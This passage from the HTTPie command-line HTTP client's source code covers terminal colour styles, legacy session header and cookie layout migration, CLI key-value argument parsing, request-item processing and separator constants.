if isinstance(lexer, JsonLexer): lexer = EnhancedJsonLexer() return lexer class Solarized256Style(pygments.style.Style): """ solarized256 ------------ A Pygments style inspired by Solarized's 256 color mode. :copyright: (c) 2011 by Hank Gay, (c) 2012 by John Mastro. :license: BSD, see LICENSE for more details. """ BASE03 = "#1c1c1c" BASE02 = "#262626" BASE01 = "#4e4e4e" BASE00 = "#585858" BASE0 = "#808080" BASE1 = "#8a8a8a" BASE2 = "#d7d7af" BASE3 = "#ffffd7" YELLOW = "#af8700" ORANGE = "#d75f00" RED = "#af0000" MAGENTA = "#af005f" VIOLET = "#5f5faf" BLUE = "#0087ff" CYAN = "#00afaf" GREEN = "#5f8700" background_color = BASE03 styles = { pygments.token.Keyword: GREEN, pygments.token.Keyword.Constant: ORANGE, pygments.token.Keyword.Declaration: BLUE, pygments.token.Keyword.Namespace: ORANGE, pygments.token.Keyword.Reserved: BLUE, pygments.token.Keyword.Type: RED, pygments.token.Name.Attribute: BASE1, pygments.token.Name.Builtin: BLUE, pygments.token.Name.Builtin.Pseudo: BLUE, pygments.token.Name.Class: BLUE, pygments.token.Name.Constant: ORANGE, pygments.token.Name.Decorator: BLUE, pygments.token.Name.Entity: ORANGE, pygments.token.Name.Exception: YELLOW, pygments.token.Name.Function: BLUE, pygments.token.Name.Tag: BLUE, pygments.token.Name.Variable: BLUE, pygments.token.String: CYAN, pygments.token.String.Backtick: BASE01, pygments.token.String.Char: CYAN, pygments.token.String.Doc: CYAN, pygments.token.String.Escape: RED, pygments.token.String.Heredoc: CYAN, pygments.token.String.Regex: RED, pygments.token.Number: CYAN, pygments.token.Operator: BASE1, pygments.token.Operator.Word: GREEN, pygments.token.Comment: BASE01, pygments.token.Comment.Preproc: GREEN, pygments.token.Comment.Special: GREEN, pygments.token.Generic.Deleted: CYAN, pygments.token.Generic.Emph: PYGMENTS_ITALIC, pygments.token.Generic.Error: RED, pygments.token.Generic.Heading: ORANGE, pygments.token.Generic.Inserted: GREEN, pygments.token.Generic.Strong: PYGMENTS_BOLD, pygments.token.Generic.Subheading: ORANGE, pygments.token.Token: BASE1, pygments.token.Token.Other: ORANGE, } PIE_HEADER_STYLE = { # HTTP line / Headers / Etc. 
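    # (Each entry maps a Pygments token type to a style value; combinations
    #  such as PYGMENTS_BOLD | PieColor.PRIMARY compose the 'bold' modifier
    #  with a palette colour (see ..ui.palette.ColorString), and make_style()
    #  below resolves the palette part to a concrete colour for the active
    #  shade via get_color().)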
pygments.token.Name.Namespace: PYGMENTS_BOLD | PieColor.PRIMARY, pygments.token.Keyword.Reserved: PYGMENTS_BOLD | PieColor.GREY, pygments.token.Operator: PYGMENTS_BOLD | PieColor.GREY, pygments.token.Number: PYGMENTS_BOLD | PieColor.GREY, pygments.token.Name.Function.Magic: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Name.Exception: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Name.Attribute: PieColor.BLUE, pygments.token.String: PieColor.PRIMARY, # HTTP Methods pygments.token.Name.Function: PYGMENTS_BOLD | PieColor.GREY, pygments.token.Name.Function.HTTP.GET: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Name.Function.HTTP.HEAD: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Name.Function.HTTP.POST: PYGMENTS_BOLD | PieColor.YELLOW, pygments.token.Name.Function.HTTP.PUT: PYGMENTS_BOLD | PieColor.ORANGE, pygments.token.Name.Function.HTTP.PATCH: PYGMENTS_BOLD | PieColor.ORANGE, pygments.token.Name.Function.HTTP.DELETE: PYGMENTS_BOLD | PieColor.RED, # HTTP status codes pygments.token.Number.HTTP.INFO: PYGMENTS_BOLD | PieColor.AQUA, pygments.token.Number.HTTP.OK: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Number.HTTP.REDIRECT: PYGMENTS_BOLD | PieColor.YELLOW, pygments.token.Number.HTTP.CLIENT_ERR: PYGMENTS_BOLD | PieColor.ORANGE, pygments.token.Number.HTTP.SERVER_ERR: PYGMENTS_BOLD | PieColor.RED, # Metadata pygments.token.Name.Decorator: PieColor.GREY, pygments.token.Number.SPEED.FAST: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Number.SPEED.AVG: PYGMENTS_BOLD | PieColor.YELLOW, pygments.token.Number.SPEED.SLOW: PYGMENTS_BOLD | PieColor.ORANGE, pygments.token.Number.SPEED.VERY_SLOW: PYGMENTS_BOLD | PieColor.RED, } PIE_BODY_STYLE = { # {}[]: pygments.token.Punctuation: PieColor.GREY, # Keys pygments.token.Name.Tag: PieColor.PINK, # Values pygments.token.Literal.String: PieColor.GREEN, pygments.token.Literal.String.Double: PieColor.GREEN, pygments.token.Literal.Number: PieColor.AQUA, pygments.token.Keyword: PieColor.ORANGE, # Other stuff pygments.token.Text: PieColor.PRIMARY, pygments.token.Name.Attribute: PieColor.PRIMARY, pygments.token.Name.Builtin: PieColor.BLUE, pygments.token.Name.Builtin.Pseudo: PieColor.BLUE, pygments.token.Name.Class: PieColor.BLUE, pygments.token.Name.Constant: PieColor.ORANGE, pygments.token.Name.Decorator: PieColor.BLUE, pygments.token.Name.Entity: PieColor.ORANGE, pygments.token.Name.Exception: PieColor.YELLOW, pygments.token.Name.Function: PieColor.BLUE, pygments.token.Name.Variable: PieColor.BLUE, pygments.token.String: PieColor.AQUA, pygments.token.String.Backtick: PieColor.SECONDARY, pygments.token.String.Char: PieColor.AQUA, pygments.token.String.Doc: PieColor.AQUA, pygments.token.String.Escape: PieColor.RED, pygments.token.String.Heredoc: PieColor.AQUA, pygments.token.String.Regex: PieColor.RED, pygments.token.Number: PieColor.AQUA, pygments.token.Operator: PieColor.PRIMARY, pygments.token.Operator.Word: PieColor.GREEN, pygments.token.Comment: PieColor.SECONDARY, pygments.token.Comment.Preproc: PieColor.GREEN, pygments.token.Comment.Special: PieColor.GREEN, pygments.token.Generic.Deleted: PieColor.AQUA, pygments.token.Generic.Emph: PYGMENTS_ITALIC, pygments.token.Generic.Error: PieColor.RED, pygments.token.Generic.Heading: PieColor.ORANGE, pygments.token.Generic.Inserted: PieColor.GREEN, pygments.token.Generic.Strong: PYGMENTS_BOLD, pygments.token.Generic.Subheading: PieColor.ORANGE, pygments.token.Token: PieColor.PRIMARY, pygments.token.Token.Other: PieColor.ORANGE, } def make_style(name, raw_styles, shade): def format_value(value): return ' 
'.join( get_color(part, shade) or part for part in value.split() ) bases = (pygments.style.Style,) data = { 'styles': { key: format_value(value) for key, value in raw_styles.items() } } return type(name, bases, data) def make_styles(): styles = {} for shade, name in SHADE_TO_PIE_STYLE.items(): styles[name] = [ make_style(name, style_map, shade) for style_name, style_map in [ (f'Pie{name}HeaderStyle', PIE_HEADER_STYLE), (f'Pie{name}BodyStyle', PIE_BODY_STYLE), ] ] return styles PIE_STYLES = make_styles() PIE_STYLE_NAMES = list(PIE_STYLES.keys()) BUNDLED_STYLES |= PIE_STYLES.keys() File: httpie/legacy/v3_2_0_session_header_format.py from typing import Any, Type, List, Dict, TYPE_CHECKING if TYPE_CHECKING: from httpie.sessions import Session OLD_HEADER_STORE_WARNING = '''\ Outdated layout detected for the current session. Please consider updating it, in order to use the latest features regarding the header layout. For fixing the current session: $ httpie cli sessions upgrade {hostname} {session_id} ''' OLD_HEADER_STORE_WARNING_FOR_NAMED_SESSIONS = '''\ For fixing all named sessions: $ httpie cli sessions upgrade-all ''' OLD_HEADER_STORE_LINK = '\nSee $INSERT_LINK for more information.' def pre_process(session: 'Session', headers: Any) -> List[Dict[str, Any]]: """Serialize the headers into a unified form and issue a warning if the session file is using the old layout.""" is_old_style = isinstance(headers, dict) if is_old_style: normalized_headers = list(headers.items()) else: normalized_headers = [ (item['name'], item['value']) for item in headers ] if is_old_style: warning = OLD_HEADER_STORE_WARNING.format(hostname=session.bound_host, session_id=session.session_id) if not session.is_anonymous: warning += OLD_HEADER_STORE_WARNING_FOR_NAMED_SESSIONS warning += OLD_HEADER_STORE_LINK session.warn_legacy_usage(warning) return normalized_headers def post_process( normalized_headers: List[Dict[str, Any]], *, original_type: Type[Any] ) -> Any: """Deserialize given header store into the original form it was used in.""" if issubclass(original_type, dict): # For the legacy behavior, preserve the last value. return { item['name']: item['value'] for item in normalized_headers } else: return normalized_headers def fix_layout(session: 'Session', *args, **kwargs) -> None: from httpie.sessions import materialize_headers if not isinstance(session['headers'], dict): return None session['headers'] = materialize_headers(session['headers']) File: httpie/legacy/v3_1_0_session_cookie_format.py import argparse from typing import Any, Type, List, Dict, TYPE_CHECKING if TYPE_CHECKING: from httpie.sessions import Session INSECURE_COOKIE_JAR_WARNING = '''\ Outdated layout detected for the current session. Please consider updating it, in order to not get affected by potential security problems. For fixing the current session: With binding all cookies to the current host (secure): $ httpie cli sessions upgrade --bind-cookies {hostname} {session_id} Without binding cookies (leaving them as is) (insecure): $ httpie cli sessions upgrade {hostname} {session_id} ''' INSECURE_COOKIE_JAR_WARNING_FOR_NAMED_SESSIONS = '''\ For fixing all named sessions: With binding all cookies to the current host (secure): $ httpie cli sessions upgrade-all --bind-cookies Without binding cookies (leaving them as is) (insecure): $ httpie cli sessions upgrade-all ''' INSECURE_COOKIE_SECURITY_LINK = '\nSee https://pie.co/docs/security for more information.' 
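# A minimal sketch of the conversion performed by pre_process() below
# (illustrative attribute names only; real session files contain more):
#
#     old layout, a name -> attributes mapping:
#         {'sessionid': {'value': 'abc', 'path': '/'}}
#
#     new layout, a list of dicts with an explicit 'name' key:
#         [{'name': 'sessionid', 'value': 'abc', 'path': '/'}]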
def pre_process(session: 'Session', cookies: Any) -> List[Dict[str, Any]]: """Load the given cookies to the cookie jar while maintaining support for the old cookie layout.""" is_old_style = isinstance(cookies, dict) if is_old_style: normalized_cookies = [ { 'name': key, **value } for key, value in cookies.items() ] else: normalized_cookies = cookies should_issue_warning = is_old_style and any( cookie.get('domain', '') == '' for cookie in normalized_cookies ) if should_issue_warning: warning = INSECURE_COOKIE_JAR_WARNING.format(hostname=session.bound_host, session_id=session.session_id) if not session.is_anonymous: warning += INSECURE_COOKIE_JAR_WARNING_FOR_NAMED_SESSIONS warning += INSECURE_COOKIE_SECURITY_LINK session.warn_legacy_usage(warning) return normalized_cookies def post_process( normalized_cookies: List[Dict[str, Any]], *, original_type: Type[Any] ) -> Any: """Convert the cookies to their original format for maximum compatibility.""" if issubclass(original_type, dict): return { cookie.pop('name'): cookie for cookie in normalized_cookies } else: return normalized_cookies def fix_layout(session: 'Session', hostname: str, args: argparse.Namespace) -> None: if not isinstance(session['cookies'], dict): return None session['cookies'] = [ { 'name': key, **value } for key, value in session['cookies'].items() ] for cookie in session.cookies: if cookie.domain == '': if args.bind_cookies: cookie.domain = hostname else: cookie._rest['is_explicit_none'] = True File: httpie/legacy/__init__.py File: httpie/cli/argtypes.py import argparse import getpass import os import sys from copy import deepcopy from typing import List, Optional, Union from .constants import DEFAULT_FORMAT_OPTIONS, SEPARATOR_CREDENTIALS from ..sessions import VALID_SESSION_NAME_PATTERN class KeyValueArg: """Base key-value pair parsed from CLI.""" def __init__(self, key: str, value: Optional[str], sep: str, orig: str): self.key = key self.value = value self.sep = sep self.orig = orig def __eq__(self, other: 'KeyValueArg'): return self.__dict__ == other.__dict__ def __repr__(self): return repr(self.__dict__) class SessionNameValidator: def __init__(self, error_message: str): self.error_message = error_message def __call__(self, value: str) -> str: # Session name can be a path or just a name. if (os.path.sep not in value and not VALID_SESSION_NAME_PATTERN.search(value)): raise argparse.ArgumentError(None, self.error_message) return value class Escaped(str): """Represents an escaped character.""" def __repr__(self): return f"Escaped({repr(str(self))})" class KeyValueArgType: """A key-value pair argument type used with `argparse`. Parses a key-value arg and constructs a `KeyValueArg` instance. Used for headers, form data, and other key-value pair types. """ key_value_class = KeyValueArg def __init__(self, *separators: str): self.separators = separators self.special_characters = set() for separator in separators: self.special_characters.update(separator) def __call__(self, s: str) -> KeyValueArg: """Parse raw string arg and return `self.key_value_class` instance. The best of `self.separators` is determined (first found, longest). Back slash escaped characters aren't considered as separators (or parts thereof). Literal back slash characters have to be escaped as well (r'\\'). """ tokens = self.tokenize(s) # Sorting by length ensures that the longest one will be # chosen as it will overwrite any shorter ones starting # at the same position in the `found` dictionary. 
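        # E.g. with separators ('=', '=='), the arg 'limit==50' matches both
        # at position 5; '==' is processed last (shortest first) and
        # overwrites '=' in `found`, so the resulting KeyValueArg carries
        # sep '==' (a URL parameter) rather than '=' (a data field).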
separators = sorted(self.separators, key=len) for i, token in enumerate(tokens): if isinstance(token, Escaped): continue found = {} for sep in separators: pos = token.find(sep) if pos != -1: found[pos] = sep if found: # Starting first, longest separator found. sep = found[min(found.keys())] key, value = token.split(sep, 1) # Any preceding tokens are part of the key. key = ''.join(tokens[:i]) + key # Any following tokens are part of the value. value += ''.join(tokens[i + 1:]) break else: raise argparse.ArgumentTypeError(f'{s!r} is not a valid value') return self.key_value_class(key=key, value=value, sep=sep, orig=s) def tokenize(self, s: str) -> List[Union[str, Escaped]]: r"""Tokenize the raw arg string There are only two token types - strings and escaped characters: >>> KeyValueArgType('=').tokenize(r'foo\=bar\\baz') ['foo', Escaped('='), 'bar\\\\baz'] """ tokens = [''] characters = iter(s) for char in characters: if char == '\\': char = next(characters, '') if char not in self.special_characters: tokens[-1] += '\\' + char else: tokens.extend([Escaped(char), '']) else: tokens[-1] += char return tokens class PromptMixin: def _prompt_password(self, prompt: str) -> str: prompt_text = f'http: {prompt}: ' try: return self._getpass(prompt_text) except (EOFError, KeyboardInterrupt): sys.stderr.write('\n') sys.exit(0) @staticmethod def _getpass(prompt): # To allow easy mocking. return getpass.getpass(str(prompt)) class SSLCredentials(PromptMixin): """Represents the passphrase for the certificate's key.""" def __init__(self, value: Optional[str]) -> None: self.value = value def prompt_password(self, key_file: str) -> None: self.value = self._prompt_password(f'passphrase for {key_file}') class AuthCredentials(KeyValueArg, PromptMixin): """Represents parsed credentials.""" def has_password(self) -> bool: return self.value is not None def prompt_password(self, host: str) -> None: self.value = self._prompt_password(f'password for {self.key}@{host}:') class AuthCredentialsArgType(KeyValueArgType): """A key-value arg type that parses credentials.""" key_value_class = AuthCredentials def __call__(self, s): """Parse credentials from `s`. ("username" or "username:password"). """ try: return super().__call__(s) except argparse.ArgumentTypeError: # No password provided, will prompt for it later. return self.key_value_class( key=s, value=None, sep=SEPARATOR_CREDENTIALS, orig=s ) parse_auth = AuthCredentialsArgType(SEPARATOR_CREDENTIALS) def readable_file_arg(filename): try: with open(filename, 'rb'): return filename except OSError as ex: raise argparse.ArgumentTypeError(f'{ex.filename}: {ex.strerror}') def parse_format_options(s: str, defaults: Optional[dict]) -> dict: """ Parse `s` and update `defaults` with the parsed values. >>> parse_format_options( ... defaults={'json': {'indent': 4, 'sort_keys': True}}, ... s='json.indent:2,json.sort_keys:False', ... 
) {'json': {'indent': 2, 'sort_keys': False}} """ value_map = { 'true': True, 'false': False, } options = deepcopy(defaults or {}) for option in s.split(','): try: path, value = option.lower().split(':') section, key = path.split('.') except ValueError: raise argparse.ArgumentTypeError(f'invalid option {option!r}') if value in value_map: parsed_value = value_map[value] else: if value.isnumeric(): parsed_value = int(value) else: parsed_value = value if defaults is None: options.setdefault(section, {}) else: try: default_value = defaults[section][key] except KeyError: raise argparse.ArgumentTypeError( f'invalid key {path!r}') default_type, parsed_type = type(default_value), type(parsed_value) if parsed_type is not default_type: raise argparse.ArgumentTypeError( 'invalid value' f' {value!r} in {option!r}' f' (expected {default_type.__name__}' f' got {parsed_type.__name__})' ) options[section][key] = parsed_value return options PARSED_DEFAULT_FORMAT_OPTIONS = parse_format_options( s=','.join(DEFAULT_FORMAT_OPTIONS), defaults=None, ) def response_charset_type(encoding: str) -> str: try: ''.encode(encoding) except LookupError: raise argparse.ArgumentTypeError( f'{encoding!r} is not a supported encoding') return encoding def response_mime_type(mime_type: str) -> str: if mime_type.count('/') != 1: raise argparse.ArgumentTypeError( f'{mime_type!r} doesn’t look like a mime type; use type/subtype') return mime_type File: httpie/cli/options.py import argparse import textwrap import typing from dataclasses import dataclass, field from enum import Enum, auto from typing import Any, Optional, Dict, List, Tuple, Type, TypeVar from httpie.cli.argparser import HTTPieArgumentParser from httpie.cli.utils import Manual, LazyChoices class Qualifiers(Enum): OPTIONAL = auto() ZERO_OR_MORE = auto() ONE_OR_MORE = auto() SUPPRESS = auto() def map_qualifiers( configuration: Dict[str, Any], qualifier_map: Dict[Qualifiers, Any] ) -> Dict[str, Any]: return { key: qualifier_map[value] if isinstance(value, Qualifiers) else value for key, value in configuration.items() } def drop_keys( configuration: Dict[str, Any], key_blacklist: Tuple[str, ...] 
): return { key: value for key, value in configuration.items() if key not in key_blacklist } PARSER_SPEC_VERSION = '0.0.1a0' @dataclass class ParserSpec: program: str description: Optional[str] = None epilog: Optional[str] = None groups: List['Group'] = field(default_factory=list) man_page_hint: Optional[str] = None source_file: Optional[str] = None def finalize(self) -> 'ParserSpec': if self.description: self.description = textwrap.dedent(self.description) if self.epilog: self.epilog = textwrap.dedent(self.epilog) for group in self.groups: group.finalize() return self def add_group(self, name: str, **kwargs) -> 'Group': group = Group(name, **kwargs) self.groups.append(group) return group def serialize(self) -> Dict[str, Any]: return { 'name': self.program, 'description': self.description, 'groups': [group.serialize() for group in self.groups], } @dataclass class Group: name: str description: str = '' is_mutually_exclusive: bool = False arguments: List['Argument'] = field(default_factory=list) def finalize(self) -> None: if self.description: self.description = textwrap.dedent(self.description) def add_argument(self, *args, **kwargs): argument = Argument(list(args), kwargs.copy()) argument.post_init() self.arguments.append(argument) return argument def serialize(self) -> Dict[str, Any]: return { 'name': self.name, 'description': self.description or None, 'is_mutually_exclusive': self.is_mutually_exclusive, 'args': [argument.serialize() for argument in self.arguments], } class Argument(typing.NamedTuple): aliases: List[str] configuration: Dict[str, Any] def post_init(self): """Run a bunch of post-init hooks.""" # If there is a short help, then create the longer version from it. short_help = self.configuration.get('short_help') if ( short_help and 'help' not in self.configuration and self.configuration.get('action') != 'lazy_choices' ): self.configuration['help'] = f'\n{short_help}\n\n' def serialize(self, *, isolation_mode: bool = False) -> Dict[str, Any]: configuration = self.configuration.copy() # Unpack the dynamically computed choices, since we # will need to store the actual values somewhere. 
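        # (For example, --style is declared with action='lazy_choices' and a
        #  getter, so its concrete choices are computed here before being
        #  written into the serialized spec.)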
action = configuration.pop('action', None) short_help = configuration.pop('short_help', None) nested_options = configuration.pop('nested_options', None) if action == 'lazy_choices': choices = LazyChoices( self.aliases, **{'dest': None, **configuration}, isolation_mode=isolation_mode ) configuration['choices'] = list(choices.load()) configuration['help'] = choices.help result = {} if self.aliases: result['options'] = self.aliases.copy() else: result['options'] = [configuration['metavar']] result['is_positional'] = True qualifiers = JSON_QUALIFIER_TO_OPTIONS[configuration.get('nargs', Qualifiers.SUPPRESS)] result.update(qualifiers) description = configuration.get('help') if description and description is not Qualifiers.SUPPRESS: result['short_description'] = short_help result['description'] = description if nested_options: result['nested_options'] = nested_options python_type = configuration.get('type') if python_type is not None: if hasattr(python_type, '__name__'): type_name = python_type.__name__ else: type_name = type(python_type).__name__ result['python_type_name'] = type_name result.update({ key: value for key, value in configuration.items() if key in JSON_DIRECT_MIRROR_OPTIONS if value is not Qualifiers.SUPPRESS }) return result @property def is_positional(self): return len(self.aliases) == 0 @property def is_hidden(self): return self.configuration.get('help') is Qualifiers.SUPPRESS def __getattr__(self, attribute_name): if attribute_name in self.configuration: return self.configuration[attribute_name] else: raise AttributeError(attribute_name) ParserType = TypeVar('ParserType', bound=Type[argparse.ArgumentParser]) ARGPARSE_QUALIFIER_MAP = { Qualifiers.OPTIONAL: argparse.OPTIONAL, Qualifiers.SUPPRESS: argparse.SUPPRESS, Qualifiers.ZERO_OR_MORE: argparse.ZERO_OR_MORE, Qualifiers.ONE_OR_MORE: argparse.ONE_OR_MORE } ARGPARSE_IGNORE_KEYS = ('short_help', 'nested_options') def to_argparse( abstract_options: ParserSpec, parser_type: ParserType = HTTPieArgumentParser, ) -> ParserType: concrete_parser = parser_type( prog=abstract_options.program, description=abstract_options.description, epilog=abstract_options.epilog, ) concrete_parser.spec = abstract_options concrete_parser.register('action', 'lazy_choices', LazyChoices) concrete_parser.register('action', 'manual', Manual) for abstract_group in abstract_options.groups: concrete_group = concrete_parser.add_argument_group( title=abstract_group.name, description=abstract_group.description ) if abstract_group.is_mutually_exclusive: concrete_group = concrete_group.add_mutually_exclusive_group(required=False) for abstract_argument in abstract_group.arguments: concrete_group.add_argument( *abstract_argument.aliases, **drop_keys(map_qualifiers( abstract_argument.configuration, ARGPARSE_QUALIFIER_MAP ), ARGPARSE_IGNORE_KEYS) ) return concrete_parser JSON_DIRECT_MIRROR_OPTIONS = ( 'choices', 'metavar' ) JSON_QUALIFIER_TO_OPTIONS = { Qualifiers.OPTIONAL: {'is_optional': True}, Qualifiers.ZERO_OR_MORE: {'is_optional': True, 'is_variadic': True}, Qualifiers.ONE_OR_MORE: {'is_optional': False, 'is_variadic': True}, Qualifiers.SUPPRESS: {} } def to_data(abstract_options: ParserSpec) -> Dict[str, Any]: return {'version': PARSER_SPEC_VERSION, 'spec': abstract_options.serialize()} def parser_to_parser_spec(parser: argparse.ArgumentParser, **kwargs) -> ParserSpec: """Take an existing argparse parser, and create a spec from it.""" return ParserSpec( program=parser.prog, description=parser.description, epilog=parser.epilog, **kwargs ) File: 
httpie/cli/requestitems.py import os import functools from typing import Callable, Dict, IO, List, Optional, Tuple, Union from .argtypes import KeyValueArg from .constants import ( SEPARATORS_GROUP_MULTIPART, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE, SEPARATOR_GROUP_NESTED_JSON_ITEMS, SEPARATOR_DATA_RAW_JSON, SEPARATOR_DATA_STRING, SEPARATOR_FILE_UPLOAD, SEPARATOR_FILE_UPLOAD_TYPE, SEPARATOR_HEADER, SEPARATOR_HEADER_EMPTY, SEPARATOR_HEADER_EMBED, SEPARATOR_QUERY_PARAM, SEPARATOR_QUERY_EMBED_FILE, RequestType ) from .dicts import ( BaseMultiDict, MultipartRequestDataDict, RequestDataDict, RequestFilesDict, HTTPHeadersDict, RequestJSONDataDict, RequestQueryParamsDict, ) from .exceptions import ParseError from .nested_json import interpret_nested_json from ..utils import get_content_type, load_json_preserve_order_and_dupe_keys, split_iterable class RequestItems: def __init__(self, request_type: Optional[RequestType] = None): self.headers = HTTPHeadersDict() self.request_type = request_type self.is_json = request_type is None or request_type is RequestType.JSON self.data = RequestJSONDataDict() if self.is_json else RequestDataDict() self.files = RequestFilesDict() self.params = RequestQueryParamsDict() # To preserve the order of fields in file upload multipart requests. self.multipart_data = MultipartRequestDataDict() @classmethod def from_args( cls, request_item_args: List[KeyValueArg], request_type: Optional[RequestType] = None, ) -> 'RequestItems': instance = cls(request_type=request_type) rules: Dict[str, Tuple[Callable, dict]] = { SEPARATOR_HEADER: ( process_header_arg, instance.headers, ), SEPARATOR_HEADER_EMPTY: ( process_empty_header_arg, instance.headers, ), SEPARATOR_HEADER_EMBED: ( process_embed_header_arg, instance.headers, ), SEPARATOR_QUERY_PARAM: ( process_query_param_arg, instance.params, ), SEPARATOR_QUERY_EMBED_FILE: ( process_embed_query_param_arg, instance.params, ), SEPARATOR_FILE_UPLOAD: ( process_file_upload_arg, instance.files, ), SEPARATOR_DATA_STRING: ( process_data_item_arg, instance.data, ), SEPARATOR_DATA_EMBED_FILE_CONTENTS: ( process_data_embed_file_contents_arg, instance.data, ), SEPARATOR_GROUP_NESTED_JSON_ITEMS: ( process_data_nested_json_embed_args, instance.data, ), SEPARATOR_DATA_RAW_JSON: ( convert_json_value_to_form_if_needed( in_json_mode=instance.is_json, processor=process_data_raw_json_embed_arg ), instance.data, ), SEPARATOR_DATA_EMBED_RAW_JSON_FILE: ( convert_json_value_to_form_if_needed( in_json_mode=instance.is_json, processor=process_data_embed_raw_json_file_arg, ), instance.data, ), } if instance.is_json: json_item_args, request_item_args = split_iterable( iterable=request_item_args, key=lambda arg: arg.sep in SEPARATOR_GROUP_NESTED_JSON_ITEMS ) if json_item_args: pairs = [(arg.key, rules[arg.sep][0](arg)) for arg in json_item_args] processor_func, target_dict = rules[SEPARATOR_GROUP_NESTED_JSON_ITEMS] value = processor_func(pairs) target_dict.update(value) # Then handle all other items. 
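        # Dispatch on each item's separator, roughly:
        #
        #   'X-API-Token:123'  ->  instance.headers  (process_header_arg)
        #   'search==httpie'   ->  instance.params   (process_query_param_arg)
        #   'name=value'       ->  instance.data     (process_data_item_arg)
        #   'cv@~/CV.pdf'      ->  instance.files    (process_file_upload_arg)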
for arg in request_item_args: processor_func, target_dict = rules[arg.sep] value = processor_func(arg) if arg.sep in SEPARATORS_GROUP_MULTIPART: instance.multipart_data[arg.key] = value if isinstance(target_dict, BaseMultiDict): target_dict.add(arg.key, value) else: target_dict[arg.key] = value return instance JSONType = Union[str, bool, int, list, dict] def process_header_arg(arg: KeyValueArg) -> Optional[str]: return arg.value or None def process_embed_header_arg(arg: KeyValueArg) -> str: return load_text_file(arg).rstrip('\n') def process_empty_header_arg(arg: KeyValueArg) -> str: if not arg.value: return arg.value raise ParseError( f'Invalid item {arg.orig!r} (to specify an empty header use `Header;`)' ) def process_query_param_arg(arg: KeyValueArg) -> str: return arg.value def process_embed_query_param_arg(arg: KeyValueArg) -> str: return load_text_file(arg).rstrip('\n') def process_file_upload_arg(arg: KeyValueArg) -> Tuple[str, IO, str]: parts = arg.value.split(SEPARATOR_FILE_UPLOAD_TYPE) filename = parts[0] mime_type = parts[1] if len(parts) > 1 else None try: f = open(os.path.expanduser(filename), 'rb') except OSError as e: raise ParseError(f'{arg.orig!r}: {e}') return ( os.path.basename(filename), f, mime_type or get_content_type(filename), ) def convert_json_value_to_form_if_needed(in_json_mode: bool, processor: Callable[[KeyValueArg], JSONType]) -> Callable[[], str]: """ We allow primitive values to be passed to forms via JSON key/value syntax. But complex values lead to an error because there’s no clear way to serialize them. """ if in_json_mode: return processor @functools.wraps(processor) def wrapper(*args, **kwargs) -> str: try: output = processor(*args, **kwargs) except ParseError: output = None if isinstance(output, (str, int, float)): return str(output) else: raise ParseError('Cannot use complex JSON value types with --form/--multipart.') return wrapper def process_data_item_arg(arg: KeyValueArg) -> str: return arg.value def process_data_embed_file_contents_arg(arg: KeyValueArg) -> str: return load_text_file(arg) def process_data_embed_raw_json_file_arg(arg: KeyValueArg) -> JSONType: contents = load_text_file(arg) value = load_json(arg, contents) return value def process_data_raw_json_embed_arg(arg: KeyValueArg) -> JSONType: value = load_json(arg, arg.value) return value def process_data_nested_json_embed_args(pairs) -> Dict[str, JSONType]: return interpret_nested_json(pairs) def load_text_file(item: KeyValueArg) -> str: path = item.value try: with open(os.path.expanduser(path), 'rb') as f: return f.read().decode() except OSError as e: raise ParseError(f'{item.orig!r}: {e}') except UnicodeDecodeError: raise ParseError( f'{item.orig!r}: cannot embed the content of {item.value!r},' ' not a UTF-8 or ASCII-encoded text file' ) def load_json(arg: KeyValueArg, contents: str) -> JSONType: try: return load_json_preserve_order_and_dupe_keys(contents) except ValueError as e: raise ParseError(f'{arg.orig!r}: {e}') File: httpie/cli/constants.py """Parsing and processing of CLI input (args, auth credentials, files, stdin). 
""" import enum import re URL_SCHEME_RE = re.compile(r'^[a-z][a-z0-9.+-]*://', re.IGNORECASE) HTTP_POST = 'POST' HTTP_GET = 'GET' HTTP_OPTIONS = 'OPTIONS' # Various separators used in args SEPARATOR_HEADER = ':' SEPARATOR_HEADER_EMPTY = ';' SEPARATOR_CREDENTIALS = ':' SEPARATOR_PROXY = ':' SEPARATOR_HEADER_EMBED = ':@' SEPARATOR_DATA_STRING = '=' SEPARATOR_DATA_RAW_JSON = ':=' SEPARATOR_FILE_UPLOAD = '@' SEPARATOR_FILE_UPLOAD_TYPE = ';type=' # in already parsed file upload path only SEPARATOR_DATA_EMBED_FILE_CONTENTS = '=@' SEPARATOR_DATA_EMBED_RAW_JSON_FILE = ':=@' SEPARATOR_QUERY_PARAM = '==' SEPARATOR_QUERY_EMBED_FILE = '==@' # Separators that become request data SEPARATOR_GROUP_DATA_ITEMS = frozenset({ SEPARATOR_DATA_STRING, SEPARATOR_DATA_RAW_JSON, SEPARATOR_FILE_UPLOAD, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE }) SEPARATORS_GROUP_MULTIPART = frozenset({ SEPARATOR_DATA_STRING, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_FILE_UPLOAD, }) # Separators for items whose value is a filename to be embedded SEPARATOR_GROUP_DATA_EMBED_ITEMS = frozenset({ SEPARATOR_HEADER_EMBED, SEPARATOR_QUERY_EMBED_FILE, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE, }) # Separators for nested JSON items SEPARATOR_GROUP_NESTED_JSON_ITEMS = frozenset([ SEPARATOR_DATA_STRING, SEPARATOR_DATA_RAW_JSON, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE, ]) # Separators allowed in ITEM arguments SEPARATOR_GROUP_ALL_ITEMS = frozenset({ SEPARATOR_HEADER, SEPARATOR_HEADER_EMPTY, SEPARATOR_HEADER_EMBED, SEPARATOR_QUERY_PARAM, SEPARATOR_QUERY_EMBED_FILE, SEPARATOR_DATA_STRING, SEPARATOR_DATA_RAW_JSON, SEPARATOR_FILE_UPLOAD, SEPARATOR_DATA_EMBED_FILE_CONTENTS, SEPARATOR_DATA_EMBED_RAW_JSON_FILE, }) # Output options OUT_REQ_HEAD = 'H' OUT_REQ_BODY = 'B' OUT_RESP_HEAD = 'h' OUT_RESP_BODY = 'b' OUT_RESP_META = 'm' 